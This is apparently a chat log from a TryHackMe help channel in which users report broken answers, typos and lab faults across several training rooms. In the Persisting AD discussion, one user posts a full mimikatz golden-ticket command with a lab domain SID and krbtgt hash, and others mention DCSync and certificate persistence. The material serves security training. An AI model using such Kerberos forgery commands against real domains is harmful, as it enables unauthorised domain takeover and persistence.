There are two rounds, each round comprisingofthree questions related to a specific attack strategy that is being implemented.
https://tryhackme.com/room/malbuster task2 question 4 , it doesn't seems to accept the correct answer
maybe can i get a sanity check?
okay found it through the writeup
it needs to be updated since it has been changed on vt
I am sorry, the openvpn didn't work.
How are you connecting to the VM? Have you enumerated the box to see which ports and/or services are running on the target?
it solved! thanks.
Gave +1 Rep to @unborn pulsar
Hi, is an admin available? I have problems with rooms answers. Thanks
Hi there, I'm not admin, but what rooms are you having issues with?
many rooms, linux fundamentals, linux modules among others
Then there is a high chance you may be entering the wrong answers.
But I can't help you, if you don't tell me more specifics.
the answers are not relevant, I think there are bugs
Ok, can you specify more please?
sure, for example, task 7 on Linux fundamentals 1 room, question
"Now if I wanted to add "tryhackme" to this file named "passwords" but also keep "passwords123", what would my command be"
accept echo tryhackme > passwords
for added tryhackme to passwords and keep passwords123, answer need to be echo tryhackme >> passwords
not >
Yeah, but in your answer above, you only have one > 🙂
if we send echo tryhackme > passwords, we deletes passwords123 which is present
yes, it's problem, question is solved with echo tryhackme > passwords too
>
No, it removes it.
Where as >> appends it.
What I mean is that the site accepts the "echo tryhackme > passwords" response when it shouldn't.
It also accepts "echo tryhackme >> passwords".
ah ok, thanks
and on linux modules task9, I try to find
"Download the file given for this task, find the uniq items after sorting the file. What is the 2271st word in the output."
cat -n file.txt | sort | uniq and my 2271 lines is gunners (with sort -r to) but I can't solved it
the taskfile changed?
so, when I grep 'michele' she is on line '2379' but i can't solved it too
Did you do the two commands?
Yes, of course, with the name of the file it downloaded to me (instead of file.txt).
It seems to be an old issue not fixed yet :/ I remember reporting it a long time ago, hoping it would get fixed eventually. Tried again yesterday, no luck 😦
Confirming the observation: >25m up, 22 as the only port scanned as open 🤷♂️
I was able to find a username elsewhere 🤔
Hi, Data. I will DM you to see what you got.
Hello,
I tried to do the USTOUN room last night for 2 hours without finding where to go. So I went to see a writeup and I noticed that the port through which I am supposed to go is not open even after waiting several tens of minutes. Have you ever noticed this problem? THANKS
This is a known issue by THM Staff.
Thank you 🙂
Gave +1 Rep to @unborn pulsar
https://tryhackme.com/room/redteamthreatintel
Task 5
Question 2:How many Command and Control techniques are employed by Carbanak?
Expects a 1 number answer whereas the answer on the site is 17
https://mitre-attack.github.io/attack-navigator//#layerURL=https%3A%2F%2Fattack.mitre.org%2Fgroups%2FG0008%2FG0008-enterprise-layer.json
Had to brute force it which the answer led to 2
https://tryhackme.com/room/subdomainenumeration
Task 3
subdomain of tryhackme.com starting with B
Answer: blog.tryhackme.com
This subdomain doesnt exist anymore. The google search mentioned in the explanation above does not give the right result anymore.
Advent of Cyber 2022 - Day 21 MQTT
- typo: "Recall how we mentioned that the combability of device protocols"
this is found underneath the diagram of Client A to client B with middleware
I want to notify that this room is blocked: https://tryhackme.com/room/introtoisac. I found this link on task2 of the following room: https://tryhackme.com/room/redteamthreatintel
https://tryhackme.com/room/adventofcyber2023 Task7 ... text gets cut
https://tryhackme.com/room/adventofcyber23sidequest Task 5 image upload not working, images will not be uploaded (No file selected)
Room: https://tryhackme.com/room/powershell
Task 6: Intermediate Scripting
Goal: Create a Powershell script to scan for open ports on the local network on ports 130-140.
Question: I'm trying to understand how the answer is ||11||? Only 1 attempt responds with TCPTestSucceeded = True, the rest failed.
Can someone confirm or let me know if I'm wrong?
Seems to be working fine
What browser are you using?
This too. Have you tried other browsers?
Seems the room owner was the one that locked access to the room.
Yes, I told them to post in here because the link for the room can be found in the other room they link.
Firefox 120.0 (64-Bit)
It cannot be unblocked?
No.
Only the creator can do that?
The room creator has discretion over it in case he/she wishes to update it.
umm, i'm trying to do this room again today and I'm faced with a very strange problem...when I try and use mimikatz to do a full DC sync I get an error - I did a google search and it appears that the problem is when the environment variable of %LOGONSERVER% isnt set. I tried to manually set it (with administrator account) but it didn't take...probably some fancy lockdown settings for shared environments. Anyhow, just wanted to report it....and hopefully get to doing the lab again. Thanks https://tryhackme.com/room/persistingad
Hi, I have a problem with the golden ticket in the Active Directory exploiting room. I've tried four times with my kali vm and the attackbox but it doesn't work. but I'm sure I've got the ticket
Is the room Persisting AD (as the link seems incorrect)?
Splunk 3 VM running like a dog, please fix
Just adding that I tested again with another command, got the same result. Answer seems incorrect. Should be ||1||.
Yes, looks like I accidentally typed a few extra characters after the URL....it is persisting AD
I'm about to re-try Persisting AD room again today....I was also having the same problem yesterday.
I think there is a problem
I just got it to work....i was having trouble but i double checked my command info....domain SID, Hash and overall formatting and it worked....
here is the command I used:
mimikatz # kerberos::golden /admin:ReallyNotALegitAccount /domain:za.tryhackme.loc /id:500 /sid:S-1-5-21-3885271727-2693558621-2658995185 /krbtgt:16f9af38fca3ada405386b3b57366082 /endin:600 /renewmax:10080 /ptt
copy/paste and see if that gives an error still
thanks I will try
it only works for the active child directory, not the root for me
Does it say access denied? Or a different error?
ugh - i'm running into a problem in task4 in the room Persisting AD ....getting a new diff error. When I googled it, it sounds like the CA has a misconfiguration? I'm no expert here...i've rerun my previous commands to make sure I was using the correct exported certificate and all....
I had access denied for thmrootdc
I think there is a problem at the moment
today i get this bug too, thank you very much
Gave +1 Rep to @weary urchin
I think the root DC is just tryhackme.loc which is different than za.tryhackme.loc - would have different krbtgt hashes I believe
is the Vulnerabilities 101 room, task 4 currently doable? the first question's link leads to a deprecated API page, and it doesn't accept the answer provided by the current search at /vuln/search when specifying the correct time range
https://tryhackme.com/room/adventofcyber2023 Task 10 [Day 4] It says, Handle authentication: If the target site is behind a login, you can use the -a flag for form-based authentication. but cewl -h binds -a to a different option, as indicated in a previous screenshot.
It also says using --extension allows you to append custom extensions but I don't see --extension as a valid option.
Have you looked at the tool's man page or documentation?
yes; I ran cewl -h myself
I also looked at the source code and there's no mention of --extension
